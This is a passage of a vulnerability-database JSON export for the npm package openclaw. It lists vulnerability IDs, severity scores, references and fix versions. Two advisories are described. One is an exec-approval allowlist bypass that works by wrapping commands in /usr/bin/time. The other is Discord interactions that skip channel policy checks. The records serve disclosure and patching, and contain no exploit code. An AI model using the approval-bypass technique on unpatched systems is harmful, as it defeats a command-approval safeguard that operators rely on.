"VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42428", "GHSA-3vvq-q2qc-7rmp" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cbuu-4d6c-rben" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90976?format=api", "vulnerability_id": "VCID-cjjd-hv92-wbfn", "summary": "OpenClaw's system.run allowlist can be bypassed through an unregistered time dispatch wrapper\n## Summary\nAllow-always exec approvals did not unwrap /usr/bin/time, so an unregistered time wrapper could bypass executable binding and reuse approval state for the inner command.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `39409b6a6dd4239deea682e626bac9ba547bfb14`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/dispatch-wrapper-resolution.ts now unwraps /usr/bin/time and binds approvals to the real inner executable.\n- src/infra/exec-approvals-allow-always.test.ts ships regression coverage for time-wrapper allow-always approval bypasses.\n\nOpenClaw thanks @YLChen-007 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35666", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18772", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18733", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18773", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35666" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35666", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35666" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper" }, { "reference_url": "https://github.com/advisories/GHSA-qm9x-v7cx-7rq4", "reference_id": "GHSA-qm9x-v7cx-7rq4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qm9x-v7cx-7rq4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35666", "GHSA-qm9x-v7cx-7rq4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cjjd-hv92-wbfn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90868?format=api", "vulnerability_id": "VCID-csnc-r6fv-j3en", "summary": "OpenClaw's Discord component interaction ingress skips guild/channel policy enforcement\n## Summary\n\nDiscord button and component interaction ingress did not consistently reapply the same guild and channel policy gates used for normal inbound messages.\n\n## Impact\n\nUsers could trigger privileged component actions from contexts that should have been blocked by Discord channel policy.\n\n## Affected Component\n\n`extensions/discord/src/monitor/agent-components.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.14, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `511093d4b3` (`Discord: apply component interaction policy gates`).", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv" }, { "reference_url": "https://github.com/advisories/GHSA-jp4j-q5fc-58gv", "reference_id": "GHSA-jp4j-q5fc-58gv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jp4j-q5fc-58gv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": 